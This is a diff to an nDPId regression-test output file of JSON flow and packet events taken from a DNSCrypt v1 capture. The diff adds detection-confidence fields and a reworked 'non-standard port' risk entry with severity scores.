-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":491,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":59400,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":491,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":59400,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":49796,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":946739391046,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAAXcBYogAH4R5x4KAAABi2PeSMKEIPsGBMwAmlgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":49796,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":49796,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":493,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAABQBYoAuX4RC\/IKAAABi2PeSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":493,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":2,"flow_last_seen":946739391306,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"ts_msec":946739391306,"pkt":"ZmZmZmZmRERERERECABFAADSWtFAACoRyuGLY95ICgAAASD7snIAvm5FmleBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAAR0hTbelwStbUvrsyN4TMcjd6ciaJLWS\/+lAjdb\/qhY\/GqLYEoO6rv\/+JZlrPe5rwefrjN2pIualeqx6XQ1AD9Zj2kPVDPuO2VaFeIl38Qe5+u3sSCCBiqzaCgrP\/G5+1mPaQ9UM+44AAAABX1NQIl9UoaI="}
@@ -1019,53 +1019,53 @@
 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":2,"flow_last_seen":946739391308,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"ts_msec":946739391308,"pkt":"ZmZmZmZmRERERERECABFAADSWtJAACoRyuCLY95ICgAAASD76AgAvjixmlWBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAAR0hTbelwStbUvrsyN4TMcjd6ciaJLWS\/+lAjdb\/qhY\/GqLYEoO6rv\/+JZlrPe5rwefrjN2pIualeqx6XQ1AD9Zj2kPVDPuO2VaFeIl38Qe5+u3sSCCBiqzaCgrP\/G5+1mPaQ9UM+44AAAABX1NQIl9UoaI="}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48300,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":946739396047,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAAIclEJAAH4RqpMKAAABkFtq47ysAbsCCL4UZl4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48300,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48300,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":41108,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":946739396047,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAAXclEMgAH4RxtIKAAABkFtq46CUAbsGBGABZlsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":41108,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":41108,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":499,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAABQlEMAuX4R66UKAAABkFtq4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":499,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48237,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":946739396047,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAAXclEQgAH4RxtEKAAABkFtq47xtAbsGBEQqZlkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48237,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48237,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":501,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAABQlEQAuX4R66QKAAABkFtq4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":501,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
